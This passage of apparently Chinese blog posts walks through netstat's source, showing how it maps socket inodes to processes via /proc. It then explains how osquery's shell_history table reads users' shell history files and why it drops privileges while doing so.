2.sport = get_sname(htons(port), proto, flag_not & FLAG_NUM_PORT);,port无法无法转换,其中的FLAG_NUM_PORT就等价于--numeric-ports这个选项。

3.!flag_wide && (addr_len + port_len > short_len 这个代码的含义是判断是否需要对IP和PORT进行截断。其中flag_wide的等同于-W, --wide don't truncate IP addresses。而short_len长度是22.

4.snprintf(buf, buf_len, "%s:%s", saddr, sport);,将IP:PORT赋值给buf.

output

最终程序执行

printf("%-4s  %6ld %6ld %-*s %-*s %-11s",
           prot, rxq, txq, (int)netmax(23,strlen(local_addr)), local_addr, (int)netmax(23,strlen(rem_addr)), rem_addr, _(tcp_state[state]));

按照制定的格式解析,输出结果

finish_this_one

最终程序会执行finish_this_one(uid,inode,timers);.

static void finish_this_one(int uid, unsigned long inode, const char *timers)
{
    struct passwd *pw;

    if (flag_exp > 1) {
    if (!(flag_not & FLAG_NUM_USER) && ((pw = getpwuid(uid)) != NULL))
        printf(" %-10s ", pw->pw_name);
    else
        printf(" %-10d ", uid);
    printf("%-10lu",inode);
    }
    if (flag_prg)
    printf(" %-" PROGNAME_WIDTHs "s",prg_cache_get(inode));
    if (flag_selinux)
    printf(" %-" SELINUX_WIDTHs "s",prg_cache_get_con(inode));

    if (flag_opt)
    printf(" %s", timers);
    putchar('\n');
}

1.flag_exp 等同于-e的参数。-e, --extend display other/more information.举例如下:

netstat -e 
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode
tcp        0      0 localhost:6379          172.16.1.200:46702    ESTABLISHED redis      437788048

netstat
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 localhost:6379          172.16.1.200:46702    ESTABLISHED

发现使用-e参数会多显示UserInode号码。而在本例中还可以如果用户名不存在,则显示uid
getpwuid

2.flag_prg等同于-p, --programs display PID/Program name for sockets.举例如下:

netstat -pe
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name
tcp        0      0 localhost:6379          172.16.1.200:34062      ESTABLISHED redis      437672000  6017/redis-server *

netstat -e
Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode
tcp        0      0 localhost:6379          172.16.1.200:46702    ESTABLISHED redis      437788048

可以看到是通过prg_cache_get(inode)inode来找到对应的PID和进程信息;

3.flag_selinux等同于-Z, --context display SELinux security context for sockets

prg_cache_get

对于上面的通过inode找到对应进程的方法非常的好奇,于是去追踪prg_cache_get()函数的实现。

#define PRG_HASH_SIZE 211

#define PRG_HASHIT(x) ((x) % PRG_HASH_SIZE)

static struct prg_node {
    struct prg_node *next;
    unsigned long inode;
    char name[PROGNAME_WIDTH];
    char scon[SELINUX_WIDTH];
} *prg_hash[PRG_HASH_SIZE];

static const char *prg_cache_get(unsigned long inode)
{
    unsigned hi = PRG_HASHIT(inode);
    struct prg_node *pn;

    for (pn = prg_hash[hi]; pn; pn = pn->next)
    if (pn->inode == inode)
        return (pn->name);
    return ("-");
}

prg_hash中存储了所有的inode编号与program的对应关系,所以当给定一个inode编号时就能够找到对应的程序名称。那么prg_hash又是如何初始化的呢?

prg_cache_load

我们使用debug模式,加入-p的运行参数:

netstat-p.png

程序会运行到2289行的prg_cache_load(); 进入到prg_cache_load()函数中.

由于整个函数的代码较长,拆分来分析.

一、获取fd

#define PATH_PROC      "/proc"
#define PATH_FD_SUFF    "fd"
#define PATH_FD_SUFFl       strlen(PATH_FD_SUFF)
#define PATH_PROC_X_FD      PATH_PROC "/%s/" PATH_FD_SUFF
#define PATH_CMDLINE    "cmdline"
#define PATH_CMDLINEl       strlen(PATH_CMDLINE)
 
if (!(dirproc=opendir(PATH_PROC))) goto fail;
    while (errno = 0, direproc = readdir(dirproc)) {
    for (cs = direproc->d_name; *cs; cs++)
        if (!isdigit(*cs))
        break;
    if (*cs)
        continue;
    procfdlen = snprintf(line,sizeof(line),PATH_PROC_X_FD,direproc->d_name);
    if (procfdlen <= 0 || procfdlen >= sizeof(line) - 5)
        continue;
    errno = 0;
    dirfd = opendir(line);
    if (! dirfd) {
        if (errno == EACCES)
        eacces = 1;
        continue;
    }
    line[procfdlen] = '/';
    cmdlp = NULL;

1.dirproc=opendir(PATH_PROC);errno = 0, direproc = readdir(dirproc) 遍历/proc拿到所有的pid

2.procfdlen = snprintf(line,sizeof(line),PATH_PROC_X_FD,direproc→d_name); 遍历所有的/proc/pid拿到所有进程的fd

3.dirfd = opendir(line); 得到/proc/pid/fd的文件句柄

二、获取inode

while ((direfd = readdir(dirfd))) {
        /* Skip . and .. */
        if (!isdigit(direfd->d_name[0]))
            continue;
    if (procfdlen + 1 + strlen(direfd->d_name) + 1 > sizeof(line))
       continue;
    memcpy(line + procfdlen - PATH_FD_SUFFl, PATH_FD_SUFF "/",
        PATH_FD_SUFFl + 1);
    safe_strncpy(line + procfdlen + 1, direfd->d_name,
                    sizeof(line) - procfdlen - 1);
    lnamelen = readlink(line, lname, sizeof(lname) - 1);
    if (lnamelen == -1)
        continue;
        lname[lnamelen] = '\0';  /*make it a null-terminated string*/
 
        if (extract_type_1_socket_inode(lname, &inode) < 0)
            if (extract_type_2_socket_inode(lname, &inode) < 0)
            continue;

1.memcpy(line + procfdlen - PATH_FD_SUFFl, PATH_FD_SUFF "/",PATH_FD_SUFFl + 1);safe_strncpy(line + procfdlen + 1, direfd->d_name, sizeof(line) - procfdlen - 1); 得到遍历之后的fd信息,比如/proc/pid/fd

2.lnamelen = readlink(line, lname, sizeof(lname) - 1); 得到fd所指向的link,因为通常情况下fd一般都是链接,要么是socket链接要么是pipe链接.如下所示:

$ ls -al /proc/1289/fd
total 0
dr-x------ 2 username username  0 May 25 15:45 .
dr-xr-xr-x 9 username username  0 May 25 09:11 ..
lr-x------ 1 username username 64 May 25 16:23 0 -> 'pipe:[365366]'
l-wx------ 1 username username 64 May 25 16:23 1 -> 'pipe:[365367]'
l-wx------ 1 username username 64 May 25 16:23 2 -> 'pipe:[365368]'
lr-x------ 1 username username 64 May 25 16:23 3 -> /proc/uptime

3.通过extract_type_1_socket_inode获取到link中对应的inode编号.

#define PRG_SOCKET_PFX    "socket:["
#define PRG_SOCKET_PFXl (strlen(PRG_SOCKET_PFX))
static int extract_type_1_socket_inode(const char lname[], unsigned long * inode_p) {
 
/* If lname is of the form "socket:[12345]", extract the "12345"
   as *inode_p.  Otherwise, return -1 as *inode_p.
   */
// 判断长度是否小于 strlen(socket:[)+3
if (strlen(lname) < PRG_SOCKET_PFXl+3) return(-1);
 
//函数说明:memcmp()用来比较s1 和s2 所指的内存区间前n 个字符。
// 判断lname是否以 socket:[ 开头
if (memcmp(lname, PRG_SOCKET_PFX, PRG_SOCKET_PFXl)) return(-1);
if (lname[strlen(lname)-1] != ']') return(-1);  {
    char inode_str[strlen(lname + 1)];  /* e.g. "12345" */
    const int inode_str_len = strlen(lname) - PRG_SOCKET_PFXl - 1;
    char *serr;
 
    // 获取到inode的编号
    strncpy(inode_str, lname+PRG_SOCKET_PFXl, inode_str_len);
    inode_str[inode_str_len] = '\0';
    *inode_p = strtoul(inode_str, &serr, 0);
    if (!serr || *serr || *inode_p == ~0)
        return(-1);
}

4.获取程序对应的cmdline

if (!cmdlp) {
    if (procfdlen - PATH_FD_SUFFl + PATH_CMDLINEl >=sizeof(line) - 5)
        continue;
    safe_strncpy(line + procfdlen - PATH_FD_SUFFl, PATH_CMDLINE,sizeof(line) - procfdlen + PATH_FD_SUFFl);
fd = open(line, O_RDONLY);
if (fd < 0)
    continue;
cmdllen = read(fd, cmdlbuf, sizeof(cmdlbuf) - 1);
if (close(fd))
    continue;
if (cmdllen == -1)
    continue;
if (cmdllen < sizeof(cmdlbuf) - 1)
    cmdlbuf[cmdllen]='\0';
if (cmdlbuf[0] == '/' && (cmdlp = strrchr(cmdlbuf, '/')))
    cmdlp++;
else
    cmdlp = cmdlbuf;
}

由于cmdline是可以直接读取的,所以并不需要像读取fd那样借助与readlink()函数,直接通过read(fd, cmdlbuf, sizeof(cmdlbuf) - 1)即可读取文件内容.

5.snprintf(finbuf, sizeof(finbuf), "%s/%s", direproc->d_name, cmdlp); 拼接pidcmdlp,最终得到的就是类似与6017/redis-server *这样的效果 

6.最终程序调用prg_cache_add(inode, finbuf, "-");将解析得到的inodefinbuf加入到缓存中.

prg_cache_add

#define PRG_HASH_SIZE 211
#define PRG_HASHIT(x) ((x) % PRG_HASH_SIZE)
static struct prg_node {
    struct prg_node *next;
    unsigned long inode;
    char name[PROGNAME_WIDTH];
    char scon[SELINUX_WIDTH];
} *prg_hash[ ];
 
static void prg_cache_add(unsigned long inode, char *name, const char *scon)
{
    unsigned hi = PRG_HASHIT(inode);
    struct prg_node **pnp,*pn;
 
    prg_cache_loaded = 2;
    for (pnp = prg_hash + hi; (pn = *pnp); pnp = &pn->next) {
    if (pn->inode == inode) {
        /* Some warning should be appropriate here
           as we got multiple processes for one i-node */
        return;
    }
    }
    if (!(*pnp = malloc(sizeof(**pnp))))
    return;
    pn = *pnp;
    pn->next = NULL;
    pn->inode = inode;
    safe_strncpy(pn->name, name, sizeof(pn->name));
 
    {
    int len = (strlen(scon) - sizeof(pn->scon)) + 1;
    if (len > 0)
            safe_strncpy(pn->scon, &scon[len + 1], sizeof(pn->scon));
    else
            safe_strncpy(pn->scon, scon, sizeof(pn->scon));
    }
 
}

1.unsigned hi = PRG_HASHIT(inode); 使用inode整除211得到作为hash

2.for (pnp = prg_hash + hi; (pn = *pnp); pnp = &pn->next) 由于prg_hash是一个链表结构,所以通过for循环找到链表的结尾;

3.pn = *pnp;pn->next = NULL;pn->inode = inode;safe_strncpy(pn->name, name, sizeof(pn→name)); 为新的inode赋值并将其加入到链表的末尾;

所以prg_node是一个全局变量,是一个链表结果,保存了inode编号与pid/cmdline之间的对应关系;

prg_cache_get

static const char *prg_cache_get(unsigned long inode)
{
    unsigned hi = PRG_HASHIT(inode);
    struct prg_node *pn;
 
    for (pn = prg_hash[hi]; pn; pn = pn->next)
    if (pn->inode == inode)
        return (pn->name);
    return ("-");
}

分析完毕prg_cache_add()之后,看prg_cache_get()就很简单了.

1.unsigned hi = PRG_HASHIT(inode);通过inode号拿到hash

2.for (pn = prg_hash[hi]; pn; pn = pn->next) 遍历prg_hash链表中的每一个节点,如果遍历的inode与目标的inode相符就返回对应的信息.

总结

通过对netstat的一个简单的分析,可以发现其实netstat就是通过遍历/proc目录下的目录或者是文件来获取对应的信息.如果在一个网络进程频繁关闭打开关闭,那么使用netstat显然是相当耗时的.

osquery源码解读之分析shell_history

说明

前面两篇主要是对osquery的使用进行了说明,本篇文章将会分析osquery的源码。本文将主要对shell_historyprocess_open_sockets两张表进行说明。通过对这些表的实现分析,一方面能够了解osquery的实现通过SQL查询系统信息的机制,另一方面可以加深对Linux系统的理解。

表的说明

shell_history是用于查看shell的历史记录,而process_open_sockets是用于记录主机当前的网络行为。示例用法如下:

shell_history

osquery> select * from shell_history limit 3;
+------+------+-------------------------------------------------------------------+-----------------------------+
| uid  | time | command                                                           | history_file                |
+------+------+-------------------------------------------------------------------+-----------------------------+
| 1000 | 0    | pwd                                                               | /home/username/.bash_history |
| 1000 | 0    | ps -ef                                                            | /home/username/.bash_history |
| 1000 | 0    | ps -ef | grep java                                                | /home/username/.bash_history |
+------+------+-------------------------------------------------------------------+-----------------------------+

process_open_socket显示了一个反弹shell的链接。

osquery> select * from process_open_sockets order by pid desc limit 1;
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| pid    | fd | socket   | family | protocol | local_address | remote_address | local_port | remote_port | path | state      | net_namespace |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| 115567 | 3  | 16467630 | 2      | 6        | 192.168.2.142 | 192.168.2.143  | 46368      | 8888        |      | ESTABLISH  | 0             |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+

osquery整体的代码结构十分地清晰。所有表的定义都是位于specs下面,所有表的实现都是位于osquery/tables

我们以shell_history为例,其表的定义是在specs/posix/shell_history.table

table_name("shell_history")
description("A line-delimited (command) table of per-user .*_history data.")
schema([
    Column("uid", BIGINT, "Shell history owner", additional=True),
    Column("time", INTEGER, "Entry timestamp. It could be absent, default value is 0."),
    Column("command", TEXT, "Unparsed date/line/command history line"),
    Column("history_file", TEXT, "Path to the .*_history for this user"),
    ForeignKey(column="uid", table="users"),
])
attributes(user_data=True, no_pkey=True)
implementation("shell_history@genShellHistory")
examples([
    "select * from users join shell_history using (uid)",
])
fuzz_paths([
    "/home",
    "/Users",
])s

shell_history.table中已经定义了相关的信息,入口是shell_history.cpp中的genShellHistory()函数,甚至给出了示例的SQL语句select * from users join shell_history using (uid)shell_history.cpp是位于osquery/tables/system/posix/shell_history.cpp中。

同理,process_open_sockets的表定义位于specs/process_open_sockets.table,实现位于osquery/tables/networking/[linux|freebsd|windows]/process_open_sockets.cpp。可以看到由于process_open_sockets在多个平台上面都有,所以在linux/freebsd/windows中都存在process_open_sockets.cpp的实现。本文主要是以linux为例。

shell_history实现

前提知识

在分析之前,介绍一下Linux中的一些基本概念。我们常常会看到各种不同的unix shell,如bash、zsh、tcsh、sh等等。bash是我们目前最常见的,它几乎是所有的类unix操作中内置的一个shell。而zsh相对于bash增加了更多的功能。我们在终端输入各种命令时,其实都是使用的这些shell。

我们在用户的根目录下方利用ls -all就可以发现存在.bash_history文件,此文件就记录了我们在终端中输入的所有的命令。同样地,如果我们使用zsh,则会存在一个.zsh_history记录我们的命令。

同时在用户的根目录下还存在.bash_sessions的目录,根据这篇文章的介绍:

A new folder (~/.bash_sessions/) is used to store HISTFILE’s and .session files that are unique to sessions. If $BASH_SESSION or $TERM_SESSION_ID is set upon launching the shell (i.e. if Terminal is resuming from a saved state), the associated HISTFILE is merged into the current one, and the .session file is ran. Session saving is facilitated by means of an EXIT trap being set for a function bash_update_session_state.

.bash_sessions中存储了特定SESSION的HISTFILE和.session文件。如果在启动shell时设置了$BASH_SESSION$TERM_SESSION_ID。当此特定的SESSION启动了之后就会利用$BASH_SESSION$TERM_SESSION_ID恢复之前的状态。这也说明在.bash_sessions目录下也会存在*.history用于记录特定SESSION的历史命令信息。

分析

QueryData genShellHistory(QueryContext& context) {
    QueryData results;
    // Iterate over each user
    QueryData users = usersFromContext(context);
    for (const auto& row : users) {
        auto uid = row.find("uid");
        auto gid = row.find("gid");
        auto dir = row.find("directory");
        if (uid != row.end() && gid != row.end() && dir != row.end()) {
            genShellHistoryForUser(uid->second, gid->second, dir->second, results);
            genShellHistoryFromBashSessions(uid->second, dir->second, results);
        }
    }

    return results;
}

分析shell_history.cpp的入口函数genShellHistory():

遍历所有的用户,拿到uidgiddirectory。之后调用genShellHistoryForUser()获取用户的shell记录genShellHistoryFromBashSessions()genShellHistoryForUser()作用类似。

genShellHistoryForUser():

void genShellHistoryForUser(const std::string& uid, const std::string& gid, const std::string& directory, QueryData& results) {
    auto dropper = DropPrivileges::get();
    if (!dropper->dropTo(uid, gid)) {
        VLOG(1) << "Cannot drop privileges to UID " << uid;
        return;
    }

    for (const auto& hfile : kShellHistoryFiles) {
        boost::filesystem::path history_file = directory;
        history_file /= hfile;
        genShellHistoryFromFile(uid, history_file, results);
    }
}

可以看到在执行之前调用了:

auto dropper = DropPrivileges::get();
if (!dropper->dropTo(uid, gid)) {
    VLOG(1) << "Cannot drop privileges to UID " << uid;
    return;
}

用于对giduid降权,为什么要这么做呢?后来询问外国网友,给了一个很详尽的答案:

Think about a scenario where you are a malicious user and you spotted a vulnerability(buffer overflow) which none of us has. In the code (osquery which is running usually with root permission) you also know that history files(controlled by you) are being read by code(osquery). Now you stored a shell code (a code which is capable of destroying anything in the system)such a way that it would overwrite the saved rip. So once the function returns program control is with the injected code(shell code) with root privilege. With dropping privilege you reduce the chance of putting entire system into danger.

There are other mitigation techniques (e.g. stack guard) to avoid above scenario but multiple defenses are required

简而言之,osquery一般都是使用root权限运行的,如果攻击者在.bash_history中注入了一段恶意的shellcode代码。那么当osquery读到了这个文件之后,攻击者就能够获取到root权限了,所以通过降权的方式就能够很好地避免这样的问题。

/**
* @brief The privilege/permissions dropper deconstructor will restore
* effective permissions.
*
* There should only be a single drop of privilege/permission active.
*/
virtual ~DropPrivileges();

可以看到当函数被析构之后,就会重新恢复对应文件的权限。

之后遍历kShellHistoryFiles文件,执行genShellHistoryFromFile()代码。kShellHistoryFiles在之前已经定义,内容是:

const std::vector<std::string> kShellHistoryFiles = {
    ".bash_history", ".zsh_history", ".zhistory", ".history", ".sh_history",
};

可以发现其实在kShellHistoryFiles定义的就是常见的bash用于记录shell history目录的文件。最后调用genShellHistoryFromFile()读取.history文件,解析数据。

void genShellHistoryFromFile(const std::string& uid, const boost::filesystem::path& history_file, QueryData& results) {
    std::string history_content;
    if (forensicReadFile(history_file, history_content).ok()) {
        auto bash_timestamp_rx = xp::sregex::compile("^#(?P<timestamp>[0-9]+)$");
        auto zsh_timestamp_rx = xp::sregex::compile("^: {0,10}(?P<timestamp>[0-9]{1,11}):[0-9]+;(?P<command>.*)$");
        std::string prev_bash_timestamp;
        for (const auto& line : split(history_content, "\n")) {
            xp::smatch bash_timestamp_matches;
            xp::smatch zsh_timestamp_matches;

            if (prev_bash_timestamp.empty() &&
                xp::regex_search(line, bash_timestamp_matches, bash_timestamp_rx)) {
                prev_bash_timestamp = bash_timestamp_matches["timestamp"];
                continue;
            }

            Row r;

            if (!prev_bash_timestamp.empty()) {
                r["time"] = INTEGER(prev_bash_timestamp);
                r["command"] = line;
                prev_bash_timestamp.clear();
            } else if (xp::regex_search(
                    line, zsh_timestamp_matches, zsh_timestamp_rx)) {
                std::string timestamp = zsh_timestamp_matches["timestamp"];
                r["time"] = INTEGER(timestamp);
                r["command"] = zsh_timestamp_matches["command"];
            } else {
                r["time"] = INTEGER(0);
                r["command"] = line;
            }

            r["uid"] = uid;
            r["history_file"] = history_file.string();
            results.push_back(r);
        }
    }
}

整个代码逻辑非常地清晰。

  1. forensicReadFile(history_file, history_content)读取文件内容。
  2. 定义bash_timestamp_rxzsh_timestamp_rx的正则表达式,用于解析对应的.history文件的内容。 for (const auto& line : split(history_content, "\n"))读取文件的每一行,分别利用bash_timestamp_rxzsh_timestamp_rx解析每一行的内容。
  3. Row r;...;r["history_file"] = history_file.string();results.push_back(r);将解析之后的内容写入到Row中返回。

自此就完成了shell_history的解析工作。执行select * from shell_history就会按照上述的流程返回所有的历史命令的结果。

对于genShellHistoryFromBashSessions()函数:

void genShellHistoryFromBashSessions(const std::string &uid,const std::string &directory,QueryData &results) {
    boost::filesystem::path bash_sessions = directory;
    bash_sessions /= ".bash_sessions";

    if (pathExists(bash_sessions)) {
        bash_sessions /= "*.history";
        std::vector <std::string> session_hist_files;
        resolveFilePattern(bash_sessions, session_hist_files);

        for (const auto &hfile : session_hist_files) {
            boost::filesystem::path history_file = hfile;
            genShellHistoryFromFile(uid, history_file, results);
        }
    }
}

genShellHistoryFromBashSessions()获取历史命令的方法比较简单。

  1. 获取到.bash_sessions/*.history所有的文件;
  2. 同样调用genShellHistoryFromFile(uid, history_file, results);方法获取到历史命令;

总结

阅读一些优秀的开源软件的代码,不仅能够学习到相关的知识更能够了解到一些设计哲学。拥有快速学习能⼒的⽩帽子,是不能有短板的。有的只是⼤量的标准板和⼏块长板。